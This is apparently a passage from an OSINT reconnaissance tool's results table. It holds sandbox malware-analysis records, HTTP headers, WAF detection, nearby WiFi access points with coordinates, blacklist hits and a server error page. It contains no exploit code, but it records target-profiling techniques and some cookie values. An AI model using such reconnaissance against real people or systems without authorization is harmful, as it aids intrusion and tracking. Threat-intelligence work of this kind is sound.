[targetUID: 00000000-00001236]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://christitus.com/win"\n Pattern match: "https://christitus.com"\n Heuristic match: "r3.o.lencr.org"\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgMTRy5Br8YJ%2BjNLl7XccZpG%2BQ%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.196.254.27": ...\n\n URL: http://princepatel.co.uk/ (AV positives: 1/88 scanned on 09/15/2022 19:19:34)\n URL: http://connect-collabland.live/ (AV positives: 12/89 scanned on 09/15/2022 18:28:12)\n URL: https://heartfelt-clafoutis-7b5e35.netlify.app/ (AV positives: 13/88 scanned on 09/15/2022 16:06:16)\n URL: http://goldownloads.netlify.app/ (AV positives: 7/88 scanned on 09/15/2022 13:39:21)\n URL: https://www.gaam.games/ (AV positives: 1/88 scanned on 09/15/2022 12:17:17)\n File SHA256: 9855d6610d262f5c5ac33a4824ce6d6aff9434181e2925d2e8502f55e0f4ccc2 (AV positives: 9/75 scanned on 09/13/2022 23:52:30)\n File SHA256: 6fbdf58ac0a20649648d8b3f171ad22b5a0f75015f17f61cd9b7097a86841671 (AV positives: 22/75 scanned on 09/10/2022 23:18:07)\n File SHA256: 10eb6a8b65dc19a76287d777aa59dd82975f4af0a30f3493a4c67e21c064d0ad (AV positives: 19/75 scanned on 09/08/2022 20:19:43)\n File SHA256: f82a3a4736145f2bd6f7de2482a3df3b50006c44845bd68cee0bac92f6100c00 (AV positives: 24/75 scanned on 09/06/2022 23:11:08)\n File SHA256: 6f9c9c07baf531f437439e7ca85d184ad2aa50ac0fc19ae7df1a0200ee6662c1 (AV positives: 16/75 scanned on 09/02/2022 23:37:08)'}], u'threat_level': 0, u'size': None, u'job_id': u'632382935a368c0d7b2bad4c', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.196.254.27', u'23.62.46.138'], u'sha256': u'7df1a40eceecc8b444d042c1ffe4058ab057ba7b8d9023392e6fb5997947e311', u'sha512': u'373b179c3f0b56cb7fa16d1138be944e3b5a120dbb942cbd85859deb0a07d565b2016c6019a13c085ebcb57ca7c526564a4cd532c98275eaca701178b34ce00c', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://christitus.com/win', u'submission_id': u'632382935a368c0d7b2bad4d', u'created_at': u'2022-09-15T19:52:51+00:00', u'filename': None}], u'analysis_start_time': u'2022-09-15T19:52:51+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 9, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'e9630d6e2a4b4c8bcd263913cf4f0e98', | 35.229.48.116 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 10 | 0 | 4 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:9D:4C:90) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.216): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nwapi2.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nwapi2.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://nwapi2.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'cf-cache-status,report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.168.252']}}}, {}] |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.173): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.239): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MotoJava (Net ID: 00:01:24:F2:AB:40) | 37.7642, -122.3993 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip (Net ID: 00:02:2D:03:7C:7A) | 37.780462,-122.390564 |
| 2023-05-12 02:46:18 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Technology companies based in the San Francisco Bay Area | skip.ns.cloudflare.com |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:8080 | 104.21.6.166 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom94A3DC (Net ID: 00:0C:F6:94:A3:DC) | 50.8897, 6.0563 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00root.github.io]
https://www.openphish.com/feed.txt | 00root.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetA41A (Net ID: 00:01:36:57:A4:18) | 37.780462,-122.390564 |
| 2023-05-12 02:50:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 30, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://kikenbutsu-hei.shikaku-getter.info/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:3560:120:WilError_01"\n "Local\\SM0:3560:120:WilError_01"\n "SM0:3560:304:WilStaging_02"\n "Local\\SM0:3560:304:WilStaging_02"\n "InternetShortcutMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"202.226.37.169:80"\n "138.91.254.96:443"\n "142.251.32.42:80"\n "104.17.25.14:443"\n "13.227.74.81:80"\n "185.199.108.153:443"\n "20.99.185.48:443"\n "142.250.189.226:80"\n "142.250.189.226:443"\n "142.250.189.194:443"\n "142.251.214.130:443"\n "142.250.189.234:443"\n "142.250.191.33:443"\n "142.250.189.162:443"\n "172.217.12.99:443"\n "142.250.189.227:443"\n "142.251.32.36:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kikenbutsu-hei.shikaku-getter.info"\n "ajax.googleapis.com"\n "dn.msmstatic.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /images/favicon.ico HTTP/1.1\nHost: kikenbutsu-hei.shikaku-getter.info\nConnection: keep-alive\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56\nAccept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8\nReferer: http://kikenbutsu-hei.shikaku-getter.info/\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: _ga_YTHJT2QPH0=GS1.1.1683852253.1.0.1683852253.0.0.0; _ga=GA1.2.504460167.1683852253; _gid=GA1.2.251658778.1683852255; _gat_gtag_UA_105729601_1=1; __gads=ID=37b1f143d2eff9ac-22522163abde00b6:T=1683852256:RT=1683852256:S=ALNI_Ma8Y6OT5-ZRyf8rZfw3X1o10bxaMw; __gpi=UID=00000989794fbd85:T=1683852256:RT=1683852256:S=ALNI_MY1Pcut_bZsdRPcxBF9Ibwxm1KXuw"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"adservice.google.com"\n "ajax.googleapis.com"\n "ajaxzip3.github.io"\n "api.edgeoffer.microsoft.com"\n "arc.msn.com"\n "cdnjs.cloudflare.com"\n "dn.msmstatic.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "googleads.g.doubleclick.net"\n "kikenbutsu-hei.shikaku-getter.info"\n "pagead2.googlesyndication.com"\n "partner.googleadservices.com"\n "tpc.googlesyndication.com"\n "www.be-index.com"\n "www.googletagservices.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\shopping.js]- [targetUID: 00000000-00007752]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007872]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\7752_445480169\\edge_driver.js]- [targetUID: 00000000-00007752]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\edge_driver.js]- [targetUID: 00000000-00007752]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00007872]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\7752_445480169\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00007752]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\auto_open_controller.js]- [targetUID: 00000000-00007752]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007752]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\7752_445480169\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00007752]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007752]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007752]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\product_page.js]- [targetUID: 00000000-00007752]\n "c0b99d91-76c9-4b69-aa3 | 185.199.108.153 |
| 2023-05-12 02:56:16 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://www.ayhu.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://www.ayhu.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | www.ayhu.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | www.hollywoodbowl.org (Net ID: 00:01:F4:ED:A0:89) | 34.0544, -118.244 |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 4 | 0 | None | http://vscode.battleb0t.xyz | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>vscode.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:21 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">vscode.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f606679610ce9</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet8682 (Net ID: 00:01:36:5B:86:80) | 37.7813933,-122.3918002 |
| 2023-05-12 03:09:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.133:80 | 185.199.108.0/24 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | tumblr (Category: images)
https://Altpapier.tumblr.com | Altpapier |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 35.229.48.116 |
| 2023-05-12 02:59:13 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'104.17.244.204', u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://info.pcmiler.com/trial36download', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"{"url":"https://info.pcmiler.com/trial36download","portal":4239221,"content":77280338489,"group":-1,"connection":{},"timing":{"navigationStart":1658937102290,"unloadEventStart":0,"unloadEventEnd":0,"redirectStart":0,"redirectEnd":0,"fetchStart":1658937102290,"domainLookupStart":1658937102298,"domainLookupEnd":1658937102298,"connectStart":1658937102298,"connectEnd":1658937102298,"requestStart":1658937102298,"responseStart":1658937102298,"responseEnd":1658937102509,"domLoading":1658937102298,"domInteractive":1658937108930,"domContentLoadedEventStart":1658937109483,"domContentLoadedEventEnd":1658937109539,"domComplete":1658937110504,"loadEventStart":1658937110555,"loadEventEnd":1658937110556,"msFirstPaint":1658937108124}}" (Indicator: "connect") in Source: SSL_199.60.103.254\n "MaxConnectionsPerServer" (Indicator: "MaxConnectionsPerServer") in Source: 00000000-00000836-00000BCA-9552128\n "MaxConnectionsPer1_0Server" (Indicator: "MaxConnectionsPer1_0Server") in Source: 00000000-00000836-00000BCA-9553085'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1B6C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1B3B.tmp" as clean (type is "data")'}, {u'category': 